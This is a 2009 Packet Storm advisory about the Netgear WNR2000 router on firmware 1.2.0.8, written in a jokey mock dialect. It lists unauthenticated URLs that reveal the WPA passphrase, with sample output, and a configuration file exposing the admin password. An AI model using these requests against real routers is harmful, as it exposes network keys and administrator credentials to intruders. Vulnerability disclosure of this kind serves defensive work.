Netgear WNR2000 FW 1.2.0.8 Disclosure

2009-08-25T00:00:00
ID PACKETSTORM:80583
Type packetstorm
Reporter Jean Trolleur
Modified 2009-08-25T00:00:00

Description

                                        
                                            `Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless  
routa' runnin' firmware 1.2.0.8.  
  
1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply  
request widout audenticashun:  
  
http://netgear/router-info.htm  
http://netgear/cgi-bin/router-info.htm  
  
De routa' gots'ta respond wid:  
  
DeviceID:WNR2000;  
HardwareVersion:;  
FirmwareVersion:V1.2.0.8NA;  
WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf  
  
2. Unaudenticated disclosho' man uh administrato' passwo'd Simply  
request widout audenticashun:  
  
http://netgear/cgi-bin/NETGEAR_WNR2000.cfg  
  
Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem.  
WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme  
be left as an 'esercise t'de eyeballer. Ah be baaad...  
  
  
`